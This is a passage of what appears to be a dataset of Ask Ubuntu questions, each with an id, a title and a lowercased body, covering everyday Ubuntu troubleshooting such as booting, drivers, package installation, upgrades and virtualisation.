libxrandr2 libxrender1 libxt6 lsb-base lzma make makedev mime-support module-init-tools mount mountall mtools ncurses-bin net-tools netbase ntfs-3g ntfsprogs obex-data-server openssl passwd perl perl-base perl-modules plymouth plymouth-theme-ubuntu-text policykit-1 policykit-1-gnome powermgmt-base procps psfontmgr psmisc python python-dbus python-gobject python-minimal python-support python2.6 python2.6-minimal readline-common sed sensible-utils sgml-base shared-mime-info sysv-rc sysvinit-utils tsconf ttf-dejavu-core tzdata ubuntu-keyring ucf udev udisks upstart usbmuxd util-linux uuid-runtime whiptail x-ttcidfont-conf x11-common xfonts-encodings xfonts-utils xml-core zlib1g suggested packages : ecryptfs-utils aptitude synaptic wajig dpkg-dev apt-doc bzip2 python-apt aspell-doc spellutils galeon firefox abrowser www-browser weblint-perl weblint libxml2-utils php5-cli tidy cpp-doc gcc-4.4-locales debconf-doc debconf-utils libterm-readline-gnu-perl libgnome2-perl libnet-ldap-perl defoma-doc dfontmgr libfont-freetype-perl ispell emacsen-common jed-extra gpart parted e2fsck-static mlocate locate slocate gconf-defaults-service ghostscript-cups ghostscript-x hpijs gnupg-doc xloadimage imagemagick eog libpcsclite1 apmd iproute dhcp3-client dhcp-client ppp bootchart libasound2-plugins libbonobo2-bin glibc-doc cups-common esound rng-tools desktop-base gnome-icon-theme libgnomevfs2-bin libgnomevfs2-extra gnutls-bin gphoto2 gtkam gpm krb5-doc krb5-user librsvg2-common libjasper-runtime liblcms-utils libmagickcore2-extra libpam-doc ttf-japanese-gothic ttf-japanese-mincho ttf-thryomanes ttf-baekmuk ttf-arphic-gbsn00lp ttf-arphic-bsmi00lp ttf-arphic-gkai00mp ttf-arphic-bkai00mp libparted0-dev libparted0-i18n libsasl2-modules-otp libsasl2-modules-ldap libsasl2-modules-sql libsasl2-modules-gssapi-mit libsasl2-modules-gssapi-heimdal sg3-utils make-doc nfs-common floppyd openssl-doc perl-doc python-doc python-tk python-profiler python-dbus-doc python-dbus-dbg python-gobject-dbg python2.6-doc python2.6-profiler binutils binfmt-support sgml-base-doc sysv-rc-conf bum sash watershed xfsprogs reiserfsprogs mdadm cryptsetup util-linux-locales kbd console-tools debhelper the following new packages will be installed : adduser apt apt-utils aspell aspell-en base-files base-passwd bluefish busybox-initramfs ca-certificates consolekit coreutils cpio cpp cpp-4.4 dbus dbus-x11 debconf debconf-i18n debianutils defoma dictionaries-common dmsetup dosfstools dpkg e2fslibs e2fsprogs esound-clients esound-common file findutils fontconfig fontconfig-config fuse-utils gamin gawk gcc-4.4-base gconf2 gconf2-common ghostscript gnome-keyring gnome-mime-data gnupg gnupg-curl gpgv gsfonts gvfs gvfs-backends hdparm hicolor-icon-theme ifupdown indicator-application initramfs-tools initramfs-tools-bin initscripts insserv klibc-utils libacl1 libappindicator0 libarchive1 libart-2.0-2 libasound2 libaspell15 libatasmart4 libatk1.0-0 libatk1.0-data libattr1 libaudiofile0 libavahi-client3 libavahi-common-data libavahi-common3 libavahi-glib1 libblkid1 libbluetooth3 libbonobo2-0 libbonobo2-common libbonoboui2-0 libbonoboui2-common libbz2-1.0 libc-bin libc6 libc6-i686 libcairo2 libcap2 libcdio-cdda0 libcdio-paranoia0 libcdio10 libck-connector0 libcomerr2 libcups2 libcupsimage2 libcurl3-gnutls libdatrie1 libdb4.8 libdbus-1-3 libdbus-glib-1-2 libdbusmenu-glib1 libdbusmenu-gtk1 libdevmapper1.02.1 libdirectfb-1.2-0 libdrm-intel1 libdrm-nouveau1 libdrm-radeon1 libdrm2 libeggdbus-1-0 libesd0 libexif12 libexpat1 libffi5 libfontconfig1 libfontenc1 libfreetype6 libfribidi0 libfuse2 libgail18 libgamin0 libgcc1 libgconf2-4 libgcr0 libgcrypt11 libgdbm3 libgdu0 libglade2-0 libglib2.0-0 libglib2.0-data libgmp3c2 libgnome-keyring0 libgnome2-0 libgnome2-common libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgnutls26 libgomp1 libgp11-0 libgpg-error0 libgphoto2-2 libgphoto2-port0 libgpm2 libgs8 libgssapi-krb5-2 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libgudev-1.0-0 libgvfscommon0 libhal-storage1 libhal1 libice6 libidl0 libidn11 libimobiledevice0 libindicator0 libjasper1 libjpeg62 libjson-glib-1.0-0 libk5crypto3 libkeyutils1 libklibc libkrb5-3 libkrb5support0 liblcms1 libldap-2.4-2 liblocale-gettext-perl libltdl7 liblzma1 libmagic1 libmagickcore2 libmagickwand2 libmpfr1ldbl libncurses5 libncursesw5 libnewt0.52 libnih-dbus1 libnih1 libntfs-3g75 libntfs10 libopenobex1 liborbit2 libpam-ck-connector libpam-gnome-keyring libpam-modules libpam-runtime libpam0g libpango1.0-0 libpango1.0-common libpaper-utils libpaper1 libparted0debian1 libpcre3 libpixman-1-0 libplist1 libplymouth2 libpng12-0 libpolkit-agent-1-0 libpolkit-backend-1-0 libpolkit-gobject-1-0 libpopt0 libproxy0 libpython2.6 libreadline6 libsasl2-2 libsasl2-modules libselinux1 libsepol1 libsgutils2-2 libslang2 libsm6 libsmbclient libsoup-gnome2.4-1 libsoup2.4-1 libsqlite3-0 libss2 libssl0.9.8 libstdc++6 libsysfs2 libtalloc2 libtasn1-3 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl libthai-data libthai0 libtiff4 libts-0.0-0 libudev0 libusb-0.1-4 libusb-1.0-0 libusbmuxd1 libuuid1 libwbclient0 libx11-6 libx11-data libxau6 libxcb-render-util0 libxcb-render0 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxdmcp6 libxext6 libxfixes3 libxfont1 libxft2 libxi6 libxinerama1 libxml2 libxrandr2 libxrender1 libxt6 lsb-base lzma make makedev mime-support module-init-tools mount mountall mtools ncurses-bin net-tools netbase ntfs-3g ntfsprogs obex-data-server openssl passwd perl perl-base perl-modules plymouth plymouth-theme-ubuntu-text policykit-1 policykit-1-gnome powermgmt-base procps psfontmgr psmisc python python-dbus python-gobject python-minimal python-support python2.6 python2.6-minimal readline-common sed sensible-utils sgml-base shared-mime-info sysv-rc sysvinit-utils tsconf ttf-dejavu-core tzdata ubuntu-keyring ucf udev udisks upstart usbmuxd util-linux uuid-runtime whiptail x-ttcidfont-conf x11-common xfonts-encodings xfonts-utils xml-core zlib1g 0 upgraded , 314 newly installed , 0 to remove and 0 not upgraded . need to get 0b/92.5mb of archives . after this operation , 361mb of additional disk space will be used . do you want to continue [ y/n ] ? y e : could not perform immediate configuration on 'libattr1'.please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 )
244175	after `` checking battery state '' error lowered resolution	i had suddenly the above , well known error message , after rebooting and installing nvidia drivers ( nvidia-current ) the loading screen is full sized , but the login screen is 640x480 . and after logging in also the same screen size . how to raise screen size settings , i even dont have menu only comman line in this small resolution . i tried xrandr but no success . any idea ? v12.10
244176	why do the `` used size '' in partitioning on installation do n't match the values i see in windows ?	this is what the windows screen looks like : volume layout type file system status capacity freespace ( c : ) simple dynamic ntfs healthy ( boot , page file ) 549.76gb 20.85gb hp_recovery ( e : simple dynamic ntfs healthy 16.63gb 2.54gb hp_tools ( f : ) simple dynamic fat32 healthy 4.98gb 2.13gb new volume ( h : ) simple dynamic ntfs healthy 126.95gb 126.86gb system ( d : ) simple dynamic ntfs healthy ( system ) 300mb 259mb this is the details on the ubuntu instalaltion screen : /dev/sda1 1mb unknown /dev/sda2 314mb unknown /dev/sda3 590302mb 3221mb used /dev/sda4 159537mb 15124mb used the sizes do n't match . i want to install ubuntu alongside windows on the `` new volume '' which is free space . anyone out there that can assist please ?
244177	grub boot-loader does n't start up	i installed ubuntu through usb on my netbook today ( an aspire one d257 netbook ) . the thing is , this netbook boots into a chrome os kinda thing then to windows . after i installed ubuntu and restarted , the grub boot loader does n't even show up . it boots to chrome os then windows . i have n't got the slightest idea what to do . netbook info : processor : intel atom n570 ( 1.66ghz , 1mb l2 cache ) memory : 2gb ddr3 memory storage : 320 gb hdd
244186	how can i get a list of all apps in the ubuntu software center ?	iâ´am playing with software center 's api , after seeing this post on askubuntu . my question is : how can i get a list of all ubuntu software center 's apps ? from the other question i get this endpoint for retrieving all apps : http : //software-center.ubuntu.com/api/2.0/applications/any/ubuntu/any/any/ but the problem is it looks like it only returns 580 apps . but on appnr.com it seems their a lot more apps in the ubuntu software center ? like 30204 packages ? so then how can i get all ubuntu software center 's apps ?
244192	xen - install fully paravirtualized ubuntu - no virtual kernel in bootloader	i followed this guide : https : //help.ubuntu.com/community/xen i managed to get 99 % the way through it , but it appears the xen-netboot image doesnt install a virtual kernel ( it says 'generic ' at the end instead of virtual in grub menu ) as shown here : here is my config : name = 'client1-ubuntu-32' memory = 512 disk = [ 'phy : /dev/ubu-32/xen-lvm , xvda , w ' ] vif = [ ' ' ] # comment this out if uncommenting the next section ( installing ) # bootloader= '' /usr/bin/pygrub '' # this section is for installing ubuntu kernel = `` /var/lib/xen/images/ubuntu-netboot/vmlinuz '' ramdisk = `` /var/lib/xen/images/ubuntu-netboot/initrd.gz '' extra = `` debian-installer/exit/always_halt=true -- console=hvc0 '' i used the initrd and vmlinuz from the answer on this serverfault post : http : //gb.archive.ubuntu.com/ubuntu/dists/precise/main/installer-i386/current/images/netboot/xen/ to run the paravirtualized guest i need to run the 'virtual ' kernel i believe . do i have to manually copy that to the domu somehow ( i have it in my dom0 's /boot ) or is there a way for the vm to install with it ?
244196	installation problem on jdk1.7.0_11	i am trying to install my ubuntu using the downloaded jdk1.7.0_11 and jre1.7.0_11 , and i traced the questions from here and followed tat steps even it is not installing the java . in the terminal , i am getting an error like this selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/lib/jvm/jre1.7.0_11/bin/java 3 auto mode 1 /usr/lib/jvm/jdk1.7.0_11/bin/java 1 manual mode 2 /usr/lib/jvm/jre1.7.0_11/bin/java 3 manual mode press enter to keep the current choice [ * ] , or type selection number : 0 update-alternatives : warning : forcing reinstallation of alternative /usr/lib/jvm/jre1.7.0_11/bin/java because link group java is broken . update-alternatives : warning : not replacing /usr/bin/java with a link . pls guide me to work it possible to install java thank you
244198	how to install rar ( no installation candidate ) ?	i need the package rar . but i get this error whenever i try to install it : reading package lists ... done building dependency tree reading state information ... done package rar ist not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available form another source e : package 'rar ' has no installation candidate . what must i do to get rar ?
244200	upgrade ubuntu server 11.04 to 11.10 fails	i 'm trying to upgrade our ubuntu server 11.04 to 11.10 . i did an apt-get update and apt-get dist-upgrade . now , im trying to execute do-release upgrade . this is the error i get : err http : //archive.ubuntu.com/ubuntu/ oneiric/main librpmsign0 403 forbidden : ips signature match [ ip : 91.189.92.202 80 ] this is the full output : root @ zienix : /var/cache/apt # do-release-upgrade checking for a new ubuntu release your ubuntu release is not supported anymore . for upgrade information , please visit : http : //www.ubuntu.com/releaseendoflife get:1 upgrade tool signature [ 198 b ] get:2 upgrade tool [ 1471 kb ] fetched 1471 kb in 0s ( 0 b/s ) authenticate 'oneiric.tar.gz ' against 'oneiric.tar.gz.gpg ' extracting 'oneiric.tar.gz' reading cache checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done ign http : //security.ubuntu.com natty-security inrelease ign http : //archive.ubuntu.com natty inrelease ign http : //archive.ubuntu.com natty-updates inrelease hit http : //security.ubuntu.com natty-security release.gpg hit http : //archive.ubuntu.com natty release.gpg ... get:55 http : //archive.ubuntu.com oneiric-updates/main translationindex [ 74 b ] get:56 http : //archive.ubuntu.com oneiric-updates/multiverse translationindex [ 72 b ] get:57 http : //archive.ubuntu.com oneiric-updates/restricted translationindex [ 72 b ] get:58 http : //archive.ubuntu.com oneiric-updates/universe translationindex [ 73 b ] get:59 http : //archive.ubuntu.com oneiric/main translation-en [ 701 kb ] get:60 http : //archive.ubuntu.com oneiric/multiverse translation-en [ 92.6 kb ] get:61 http : //archive.ubuntu.com oneiric/restricted translation-en [ 2229 b ] get:62 http : //archive.ubuntu.com oneiric/universe translation-en [ 3165 kb ] get:63 http : //archive.ubuntu.com oneiric-updates/main translation-en [ 205 kb ] get:64 http : //archive.ubuntu.com oneiric-updates/multiverse translation-en [ 3524 b ] get:65 http : //archive.ubuntu.com oneiric-updates/restricted translation-en [ 1547 b ] get:66 http : //archive.ubuntu.com oneiric-updates/universe translation-en [ 87.6 kb ] fetched 24.0 mb in 6s ( 657 kb/s ) checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes no candidate ver : libdns66 no candidate ver : libdrm-nouveau1 no candidate ver : libeggdbus-1-0 no candidate ver : libgirepository1.0-1 no candidate ver : libicu42 no candidate ver : libisc60 no candidate ver : libisccfg60 no candidate ver : libpango1.0-common no candidate ver : libxapian15 no candidate ver : linux-image-2.6.35-22-virtual no candidate ver : linux-image-2.6.35-28-virtual no candidate ver : linux-image-2.6.35-32-virtual do you want to start the upgrade ? 1 installed package is no longer supported by canonical . you can still get support from the community . 5 packages are going to be removed . 84 new packages are going to be installed . 389 packages are going to be upgraded . you have to download a total of 8784 . this download will take about 1 second with your connection . fetching and installing the upgrade can take several hours . once the download has finished , the process can not be cancelled . continue [ yn ] details [ d ] y fetching err http : //archive.ubuntu.com/ubuntu/ oneiric/main librpmsign0 amd64 4.9.0-7 403 forbidden : ips signature match [ ip : 91.189.92.202 80 ] fetched 0 b in 0s ( 0 b/s ) err http : //archive.ubuntu.com/ubuntu/ oneiric/main librpmsign0 amd64 4.9.0-7 403 forbidden : ips signature match [ ip : 91.189.92.201 80 ] fetched 0 b in 0s ( 0 b/s ) err http : //archive.ubuntu.com/ubuntu/ oneiric/main librpmsign0 amd64 4.9.0-7 403 forbidden : ips signature match [ ip : 91.189.92.202 80 ] fetched 0 b in 0s ( 0 b/s ) could not download the upgrades the upgrade has aborted . please check your internet connection or installation media and try again . all files downloaded so far have been kept . failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/r/rpm/librpmsign0_4.9.0-7_amd64.deb 403 forbidden : ips signature match [ ip : 91.189.92.202 80 ] restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done
244206	how can i access debug info for failing vpn connection via network manager ?	i have a vpn connection set up via the network manager . today it failed because i forgot make the key files accessible , once i made them accessible , it worked . yay ! but , what if i had n't remembered ? it would have been helpful to be able to see the actual debug/info/warn/error messages . where are these logs located ? or , if they are not stored , how can i attempt to the connection from the command line ( and see the output there ) ?
244209	how to change default signature font in thunderbird 13.0.1 used in ubuntu	how to change default signature font in thunderbird 13.0.1 used in ubuntu ? i am able to setup my signature but with default fonts , i want those default font to be changed in my signature . also when i am forwarding any mail i am not getting any signature in that forwarded mail . please help . os - ubuntu , thunderbird version 13.0.1 thanks .
244210	how does one obtain and install ksokoban ?	how does one obtain and install ksokoban on ubuntu 12.10 ? it used to be there in kde 3 , but is gone now .
244213	ca n't get pandora plugin for rhythmbox 2.97 to work	i installed this repository and updated it . sudo add-apt-repository ppa : fossfreedom/rhythmbox-plugins sudo apt-get update and then installed the plugins : sudo apt-get install rhythmbox-plugin-complete everything seemed to install fine and most if not all ( did n't check everyone ) of the other plugins are in rhythmbox , but the pandora one wont come up . i 've also tried installing it from the zip with the setup.sh and still nothing in rhythmbox . any ideas are appreciated ! thanks in advance .
244214	emacs 24 in ubuntu 12.10	i am running emacs 23 on ubuntu 12.10 . i see that there is a package called emacs24 ; will installing this package overwrite my current installation ?
244220	installing 12.10 on macbook pro retina with refit	i have tried many attempts to install 12.10 on my mac retina following this guide but it boots just once and after i installed nvidia drivers it does n't boot any further . i need some help .
244226	postfix working with home network but not with usb 3g dongle	does postfix with php 's mail command get configured during installation based on the network connection ? i am asking this because i installed it when i was connected to my home network . and i can send emails no problem . however , when i need to work remotely , and connect to the internet using a usb 3g dongle , i can no longer send out emails from php . when i get back home , and connect to my home network , i can send emails via php perfectly again .
244227	why ca n't i send items to trash even though trash is empty ?	i usually delete files permanently using shift+delete . but once i accidentally sent an item to the trash can using just delete and got this error : '' trash can touched maximum limit/empty trash can manually '' . but when i view the contents of the trash can , it appears that it is actually empty : no files , no hidden files and no used space . my os is kubuntu 12.04.1 lts .
244233	what is the step by step guide to have qt ( qml ) properly setted in ubuntu 12.04 to start developping with qml ?	before i start , here is my setup : ubuntu 12.04.1 default install of qtcreator from software center . for the rest , i ' m doing all the thing from qtcreator i wanted to try some examples from qt assistant : home > qtwebkit qml module ; the code is as simple as follow : import qtwebkit 1.0 webview { url : `` http : //www.nokia.com '' preferredwidth : 490 preferredheight : 400 scale : 0.5 smooth : false } and the error i 'm getting is the one below qml debugging is enabled . only use this in a safe environment ! file : ///home/cyrildz/public/programming/ubuntuqml/ubuntuqml.qml:1:1 : module `` qtwebkit '' is not installed import qtwebkit 1.0 ^ i got this error from qtcreator and this prevent me from running the example . to set qt5 on my desktop , i took the description from http : //developer.ubuntu.com/get-started/gomobile/ that is : sudo add-apt-repository ppa : canonical-qt5-edgers/qt5-beta1 & & sudo apt-get update & & sudo apt-get install qt5-meta-full & & echo 'export path=/opt/qt5/bin : $ path ' > > ~/.bashrc and then : sudo add-apt-repository ppa : ubuntu-sdk-team/ppa & & sudo apt-get update & & sudo apt-get install qt-components-ubuntu qt-components-ubuntu-demos qt-components-ubuntu-examples qt-components-ubuntu-doc notepad-qml for more info , i looked on the folder : /usr/lib/qt4/imports and i do n't see anything relevant for the module qtwebkit1.0 . could someone please help with this issue ?
244237	gsettings and dconf	hello i need to set a hotkey in ubuntu 12.10 , i use : gsettings ( dconf ) gsettings set org.gnome.settings-daemon.plugins.media-keys.custom-keybinding : /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom2/ binding ' < primary > < alt > s ' < br > gsettings set org.gnome.settings-daemon.plugins.media-keys.custom-keybinding : /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom2/ binding ' < primary > < alt > s ' < br > gsettings set org.gnome.settings-daemon.plugins.media-keys.custom-keybinding : /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom2/ command 'gnome-terminal ' but when i look at this schema with gsettings i just see : gsettings get org.gnome.settings-daemon.plugins.media-keys custom-keybindings @ as [ ] but when i use dconf to see this schema : dconf list /org/gnome/settings-daemon/plugins/media-keys/custom-keybindings/custom2/ binding command what am i doing wrong ?
244238	can not connect to ubuntuarchive.hnsdc.com , how to install g++ ?	i am using ubuntu 10.04 . i typed sudo apt-get install g++ in the terminal and got the following output . i ca n't install g++ , nor can i upgrade my system . hrushi @ hrushi-laptop : ~ $ sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : g++-4.4 libstdc++6-4.4-dev suggested packages : g++-multilib g++-4.4-multilib gcc-4.4-doc libstdc++6-4.4-dbg libstdc++6-4.4-doc the following new packages will be installed : g++ g++-4.4 libstdc++6-4.4-dev 0 upgraded , 3 newly installed , 0 to remove and 21 not upgraded . need to get 6,443kb of archives . after this operation , 21.3mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libstdc++6-4.4-dev g++-4.4 g++ install these packages without verification [ y/n ] ? y after this i always get failed to fetch information from ubuntuarchive.hnsdc.com ( 120.88.46.4 ) .
244239	why does clicking 'shutdown ' from menu only log me off ?	whenever i click 'shutdown ' from the menu it just logs me off . i have no accounts ( exept from guest , but i keep it logged off ) logged on , but still , it just logs off and nothing else . i have auto-login on my only account , but i do n't know the password and i 'm trying to recover it .
244261	how do i get my hp laptop to boot into grub from my new efi file ?	i have an hp pavilion sleekbook 14 laptop that i have installed ubuntu 12.10 dual boot with the original windows 8 . i used boot-repair to get set up to boot into grub . my issue is that i have not been able to get it to boot straight off the new efi file that was created . i have looked around the boot options in the bios screen , but it does not give me a choice for ubuntu . the only way i can boot into ubuntu is to press f9 when i power the system on and then manually navigate to the ubuntu efi file . this works but if i am not paying close attention , it will boot into windows . after i finished running boot-repair , it told me to boot from sda2/efi/ubuntu/shimx64.efi i have seen some suggestions that i should move this file in place of the windows bootmgfw.efi , but i am concerned that i will break things and not be able to boot the windows 8 installation . while i already dislike win8 even more than win7 , i do need it from time to time for a couple tasks ... the details of my boot-repair are here : http : //paste.ubuntu.com/1418009/
244266	mini dp port not working in xps 15 l521x	i 've installed ubuntu 12.10 in my xps 15 l521x . i had some issues ( i.e . hidpoint is quite unstable for my logitech wireless mouse/keyboard and works pretty randomly ) , but now the big one that is stopping me is that i 'm unable to make my mini display-port working . i have a mini dp to vga ( branded apple ) connected to an external monitor . the monitor is working and recognized in windows 8 , but there 's no way i can make it work through ubuntu ( it does n't even detect the display ) . $ xrandr -q screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 40.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) $ lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107 [ geforce gt 640m ] ( rev ff ) honestly i 'm running out of ideas and this functionality is necessary for me . do you have any suggestion\advice that i can follow ? thanks !
244267	ubuntu 12.04lts libvirt no conenction driver available	i am trying to setup a vm using xen under ubuntu 12.04lts . i have installed the default libvirt version but i have some errors when trying to run : $ virsh -c < uri > list the errors are : error : no connection driver available for no connection for uri xen : /// error : failed to connect to the hypervisor i have found this information , but it does not really help me as my libvirt is n't compiled from sources . does anyone know how to fix this issue ?
244268	installing gawk 4.0 on ubuntu 12.04	how do i install gawk 4.0.1 or later on ubuntu 12.04 ? your suggestions would be appreciated ! !
244277	ubuntu 11.10 black screen during xen vm cloning	i am using ubuntu server 11.10 , with xen hypervisor 4.1 . beside this i have installed libvirt-0.9.2 . all things working perfectly . but some time while using virt-install or virt-clone during the installation of guest os or during clone the screen truns to black with white letters and then it hangs . this occurs not during the boot or between using any program . just while i am using terminal and use virt-install or virt-clone command line tools . or some times when i am going to start more than 1 guest operating systems . i need to know why this appears and how can i solve this .
244280	how do i prevent suggestions in the location bar in firefox with history empty ?	you know what i mean , when you type a letter in the internet browsers address bar it shows suggestions , like when you type y it suggests youtube.com . i believe this has to do with the history of visited web sites . i want to delete one such site suggestion but it is not in the firefox history . how do i delete it in this case ?
244284	how can i assign space from a logical partition to a primary one ( to resize the primary )	i have the following situation : . i want to resize the ntfs partition . specifically i want to add it 15 gb . what is the best sequence of steps to do ? the output from sudo fdisk -l /dev/sda and sudo fdisk -l /dev/sdb
244287	official daily ppa for unity ?	i found couple of blocker bugs in unity which came installed in 12.10 and swtiched to gnome shell . is there official ppa for unity to check if developers fixed the bugs already ?
244295	does blue microphones snowball ice work with ubuntu 12.04 ?	does 'blue microphones snowball ' microphone work with ubuntu 12.04 ? if the answer is 'yes ' then did it work out-of-the-box or , if it requires some work , please explain . also , if anyone has it working in later releases of ubuntu then that would be good to know . thank you .
244299	an offline-maps application	i 'd like to have a software that allows me to download and view ( openstreetmap- ) maps of the whole world or a certain area i chose to download . ideally , it should behave just like the map-website but be usable even without internet connection . do you know such an app ?
244300	booting ubuntu requires bitlocker ?	i installed ubuntu 12.10 alongside windows like i have done before on other pc 's , but now when i boot it up , it tells me to insert the drive used for bitlocker encryption . i 've never used bitlocker anywhere before on any of my pc 's . why is this happening ? it 's alongside a non-oem windows 8 installation .
244301	ubuntu 12.04 will not shutdown	my ubuntu ( 12.04 ) never shutdown . did not help this : 1 ) sudo halt 2 ) sudo shutdown -h now 3 ) update grub ( acpi-force ) i think it 's after installaton amd catalyst . my friend has similar problem and he thiks it 's after gnome-shell installation . who have similar problem , help please ! update this is my syslog http : //pastebin.com/x4vd2gh1 $ sudo /sbin/acpi_available & & echo $ ? 0
244303	is my battery going bad ?	i am wondering if my battery is bad , or if i could improve on it . basically , i am wondering why this image shows energy when full : 11.9 and energy ( design ) : 48.9 why does n't my battery get around 48.9 ? is there any way i can get more information ? can i improve this without getting a new battery ?
244307	how do i deploy units that use the -proposed repository ?	i 'd like to deploy some units with proposed fixes in ubuntu , how can i have my units deploy with these bugfixes to i can test to see if my bug is fixed ?
244311	installing ubuntu on my android tablet with cortex-a10	is there any way to install ubuntu ( some version ) on my tablet ? its domo x3g slate ( rooted ) with cortex-a10 , mali 400 mp , 8 gb internal . i just wanted to run `` natively '' and not using emulators or something like that . can someone help me with step-by-step instructions , as i 'm extremely new to this part . it 's running ics currently . thanks ! p.s . i never understood the terms kernel , bootstrap , etc ( terms related to that ) . can someone help me with that too ? ? : )
244313	how can i have different x & sound configuration depending on which user logs in ?	first off : i 'm using ubuntu 12.04 and the nvidia x server settings gui to configure . i 've recently gotten a new led tv hooked up to my computer - the video card supports two displays . i would like to create a user `` tv '' that , when they log in , the default display is the tv and my monitor is disabled . using the nvidia tool , i only seem to be able to save the settings for all users . so each time i want to watch on the tv , i have to go and reconfigure . not only the x server settings , but also the sound settings ( to make sure sound goes out to hdmi and not the computer speakers ) . i know there must be a way of easily doing this by dropping the config file into a certain location or something ... . please help !
244315	how to sync files on 2 computers using an ethernet cable ( offline ) ?	i have a laptop running ubuntu 12.04 and a netbook running ubuntu 12.10 . i want to sync some folders from my laptop on my netbook , connecting them with an ethernet cable . both computers are offline , and i do n't want to ( eventually ) share files through my office lan . what options do i have ? can i use unison ? what do i have to do in order to `` connect '' the two computers ? ( i.e . i have to manually set ips on them , ipv4 settings , and so on ) .
244318	libreoffice closes multiple windows	i am working with multiple documents in libreoffice , all are open in separate windows . when i click the exit button , or go to the file menu clicking on `` quit '' , all windows close , not just the one i wanted to close . how do i avoid closing all windows , and how can i just close one of the windows ?
244324	what does 'magic number does not match ' mean when installing software ?	i downloaded vmware-player-5.0.1-894247.i386.bundle but when i tried to install it from the terminal i got magic number does not match i use ubuntu 12.04 32-bit with 2gb ram .
244329	how to install linux on a computer with gpt ?	i recently installed windows 7 on a computer . left a partition to install linux . today when i tried to install linux , the installer ( of two distros that i tried ) failed to recognise the already present partitions . it just shows it as one big unallocated space . however fdisk recognised them just fine . turns out i have a guid partition table . so the installers do n't recognise it . i can boot both into uefi mode and legacy bios mode . if i boot into uefi mode , i ca n't boot into any os , whether it is the installed windows 7 or ubuntu or any other linux dvd . it just shows a operating system not found error . it only boots into the windows 8 that came preinstalled in the laptop in the uefi mode . i also have secure boot disabled . while installing windows 7 i booted into legacy bios mode . can anybody please tell me how i can install linux on a computer with gpt ? i do n't want to reformat the whole drive and start fresh with new partition table .
244332	screen resolution startup script in lightdm	i used to fix the resolution of my screens ( which occur quite often , we have 5 computers having this problem at office and one at home ) by setting and adding mode with xrandr in the gdm start script . this tip was given here https : //wiki.ubuntu.com/x/config/resolution but this time in 12.10 i am unable to find any file like that /etc/gdm/init/default . does anyone know if there is still one startup script at the launch of lightdm graphic session ? tks
244333	`compiz` profile settings export and import using command line	how can i export and import compiz current profile settings using command line . i 'm using ubuntu 12.10 . or can i get a script for doing export and import .
244336	receiving error while trying to debug in qtproject	i installed the latest version of the qtproject so now i can debug c++ code . while trying to debug for the first time i got this error : ptrace : operation not permitted . could not attach to the process . make sure no other debugger traces this process . check the settings of /proc/sys/kernel/yama/ptrace_scope for more details , see /etc/sysctl.d/10-ptrace.conf
244339	installation doe n't modify hdd	this is very strange , but i can run the ububtu server 12.04 64bit from the live cd to permanently install it on the hd , but when i reboot it reverts back to whatever os was on the hd prior to the installation . the partitioning does not change , noe are there any traces of ubuntu on the hd . the install runs fine , prompts for a reboot , i remove the live cd and let it reboot and it reboots into the original os . i 've tried installing and deleting and modifying partitions and said yes to making the changes permanent . the computer is a dell 1950 with a sas 6 raid controller . i 've successfully installed both windows 2003 server and fedora on it . but when i install ubuntu after installing these , whatever os was installed just prior to the install is what remains on the hd . i 'm not doing a dual boot . i 've run the ubuntu boot repair utility but that does n't help- there is simply no trace of the ubuntu installation . ther is only one hd ( actually 2 but in a raid and appear as one ) nor flash drive , nor any other place it could have installed other that the primary hd that the computer boots from . thanks for any help ! !
244342	i can not find the cube option in compiz on ubuntu 12.10 ?	i have ubuntu 12.10 and i also installed compiz config settings manager ( ccsm ) . when i open up ccsm and scroll down to desktop i do not find the option for cube . i see expo and viewport switching but no cube . why is that ?
244345	how to use small icons in kupfer ?	i do n't like the large ( 128px ) icons used in kupfer , how can i configure it to use smaller icons ? the theming documentation suggests it can be done . i 've duplicated the built in customtheme.py plugin into ~/.local/share/kupfer/plugins/mytheme.py and tried adding this code to the `` dark '' definition : # # force small icons gtk-icon-sizes= '' kupfer-small=24,24 : kupfer-large=24,24 '' but that does n't seem to change the icon size .
244347	mount a remote ( ssh ) usb disk ?	my home server has an external usb drive connected . i prefer to keep it unmounted so i do n't have to log in if i want to unplug it ( for backup rotation ) . but i 'd also like to be able to browse it in thunar from my laptop ; i tend to do ctrl+l and ssh : //server/media/me/drive , it 's very nice for copying pictures back and forth ( which is not possible with ssh -x server thunar ) is there a simple way to get thunar , running locally , to make the server mount the drive ?
244348	how to solve wierd graphical issues in ubuntu 12.10 ?	you can see with the following screen-shots that the notifications of the bottom right has glitches out and always shows up blank white . top right notifications are not affected . also something that might be related is certain windows get unframed and or transparent copying whatever the background is when moved around .
